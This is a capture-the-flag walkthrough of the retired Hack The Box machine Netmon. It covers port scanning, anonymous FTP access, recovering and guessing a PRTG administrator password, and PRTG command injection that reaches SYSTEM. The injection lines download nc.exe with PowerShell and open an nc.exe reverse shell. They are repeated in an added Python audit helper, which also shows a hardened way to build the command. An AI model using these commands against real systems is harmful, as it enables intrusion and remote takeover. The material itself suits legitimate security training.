This post documents the complete walkthrough of Netmon, a retired vulnerable VM created by mrb3n, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Netmon is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=700

Starting masscan 1.0.4 ( at 2019-03-10 13:41:15 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49666/tcp on
Discovered open port 49664/tcp on
Discovered open port 49677/tcp on
Discovered open port 49667/tcp on
Discovered open port 49665/tcp on
Discovered open port 52337/tcp on
Discovered open port 5985/tcp on
Discovered open port 139/tcp on
Discovered open port 47001/tcp on
Discovered open port 80/tcp on
Discovered open port 445/tcp on
Discovered open port 49668/tcp on
Discovered open port 21/tcp on
Discovered open port 135/tcp on
Discovered open port 53099/tcp on

Whoa. masscan finds many open ports. Let’s do one better and run nmap against the discovered ports to see what services are available.

# nmap -n -v -Pn -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677,52337,53099 -A --reason -oN nmap.txt
21/tcp    open   ftp          syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open   http         syn-ack ttl 127 Indy httpd (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open   netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
52337/tcp closed unknown      reset ttl 127
53099/tcp closed unknown      reset ttl 127
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-10 13:48:31
|_  start_date: 2019-03-10 13:32:38
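To bridge the two scans, here is an added helper (my own example, not code from the original post) that turns masscan’s discovery lines into the comma-separated list handed to nmap’s -p above, and extends the idea to UDP results using nmap’s T:/U: prefixes. The sample output is reconstructed from the scan above with the target address replaced by a documentation-range placeholder.

```python
import re
from collections import defaultdict

# One masscan discovery line per open port, e.g. "Discovered open port 80/tcp on 192.0.2.10".
DISCOVERED_RE = re.compile(
    r"^Discovered open port (?P<port>\d{1,5})/(?P<proto>tcp|udp) on (?P<host>\S+)",
    re.MULTILINE,
)

def parse_masscan(output: str) -> dict:
    """Map each host to the open TCP and UDP ports masscan reported for it."""
    hosts = defaultdict(lambda: {"tcp": set(), "udp": set()})
    for m in DISCOVERED_RE.finditer(output):
        port = int(m.group("port"))
        if not 0 < port <= 65535:
            continue  # defensive: skip anything outside the valid port range
        hosts[m.group("host")][m.group("proto")].add(port)
    return dict(hosts)

def nmap_port_spec(ports: dict) -> str:
    """Render a port set as an nmap -p value: plain list for TCP only, T:/U: lists when UDP is present."""
    tcp = ",".join(str(p) for p in sorted(ports["tcp"]))
    udp = ",".join(str(p) for p in sorted(ports["udp"]))
    if tcp and udp:
        return f"T:{tcp},U:{udp}"
    return f"U:{udp}" if udp else tcp

# Constructed sample: the discovery lines from the scan above, target address replaced by a placeholder.
SAMPLE_MASSCAN = """\
Discovered open port 49666/tcp on 192.0.2.10
Discovered open port 49664/tcp on 192.0.2.10
Discovered open port 49677/tcp on 192.0.2.10
Discovered open port 49667/tcp on 192.0.2.10
Discovered open port 49665/tcp on 192.0.2.10
Discovered open port 52337/tcp on 192.0.2.10
Discovered open port 5985/tcp on 192.0.2.10
Discovered open port 139/tcp on 192.0.2.10
Discovered open port 47001/tcp on 192.0.2.10
Discovered open port 80/tcp on 192.0.2.10
Discovered open port 445/tcp on 192.0.2.10
Discovered open port 49668/tcp on 192.0.2.10
Discovered open port 21/tcp on 192.0.2.10
Discovered open port 135/tcp on 192.0.2.10
Discovered open port 53099/tcp on 192.0.2.10
"""

if __name__ == "__main__":
    for host, ports in parse_masscan(SAMPLE_MASSCAN).items():
        print(f"nmap -n -v -Pn -p{nmap_port_spec(ports)} -A --reason {host}")
```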

Since anonymous FTP login is allowed, let’s go with that first.

File Transfer Protocol

To my pleasant surprise, C:\Users\Public is available.


And guess what, user.txt is here!


PRTG Network Monitor

Moving on to the http service, this is how it looks.


Combining the official security advisory with the known locations of PRTG’s configuration files, I was able to uncover a plaintext password from the file below.


Here’s the plaintext password.


And since this is a backup, and knowing that administrators tend to increment the year for convenience’s sake, the current password may be [email protected]. Let’s give it a shot.



PRTG < 18.2.39 Command Injection Vulnerability

During my research into vulnerabilities related to PRTG, I chanced upon this blog discussing a command injection vulnerability, one that executes with SYSTEM privileges no less.

Follow the instructions to create a custom notification with the following parameters.

test.txt; Invoke-WebRequest -OutFile c:\Users\Public\Downloads\nc.exe

If you’ve read the blog carefully, you’ll realize that certain characters are encoded. As such, I’m steering clear of those bad characters, if you will, and using PowerShell to download a copy of nc.exe to c:\Users\Public\Downloads.

Verify that nc.exe is indeed downloaded.


Next, we use the following parameters to run a reverse shell back to us.

test.txt; c:\Users\Public\Downloads\nc.exe 1234 -e cmd.exe


Getting root.txt is trivial when you have SYSTEM privileges.
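As an added illustration of the pattern behind that `;` (my own example, not PRTG’s code or the blog’s), here is a notification parameter concatenated into a command string beside the hardened form that passes it as a discrete argument, plus an audit that flags configured parameters carrying a command separator. The script name, the allowlist and the sample values are constructed; the two injected values are the ones used above.

```python
import re

# Allowlist for the notification's parameter field: a bare file name made of
# safe characters (constructed policy for this illustration).
SAFE_PARAMETER_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Shell metacharacters that turn one argument into a second command once a
# parameter is pasted into a command string (constructed list, not exhaustive).
SEPARATOR_RE = re.compile(r"[;&|`]|\$\(")

def is_safe_parameter(parameter: str) -> bool:
    """True only when the parameter is a plain file name per the allowlist."""
    return SAFE_PARAMETER_RE.fullmatch(parameter) is not None

def build_command_line_unsafe(script: str, parameter: str) -> str:
    """Constructed model of the vulnerable pattern (not PRTG's actual code): the
    parameter is concatenated into a command string that a shell will parse."""
    return f'powershell.exe -File "{script}" {parameter}'

def build_argv_safe(script: str, parameter: str) -> list[str]:
    """Hardened form: validate against the allowlist, then pass the parameter as
    a discrete argv element so no shell ever interprets it."""
    if not is_safe_parameter(parameter):
        raise ValueError(f"rejected notification parameter: {parameter!r}")
    return ["powershell.exe", "-File", script, parameter]

def audit_parameters(parameters: list[str]) -> list[str]:
    """Return the configured parameters that look like injection attempts:
    they carry a command separator or fail the allowlist."""
    return [p for p in parameters
            if SEPARATOR_RE.search(p) or not is_safe_parameter(p)]

# Constructed sample of parameter values as they might appear in a set of
# notification definitions; entries 2 and 3 are the values used in this post.
SAMPLE_PARAMETERS = [
    "test.txt",
    r"test.txt; Invoke-WebRequest -OutFile c:\Users\Public\Downloads\nc.exe",
    r"test.txt; c:\Users\Public\Downloads\nc.exe 1234 -e cmd.exe",
    "report-2019.log",
]
```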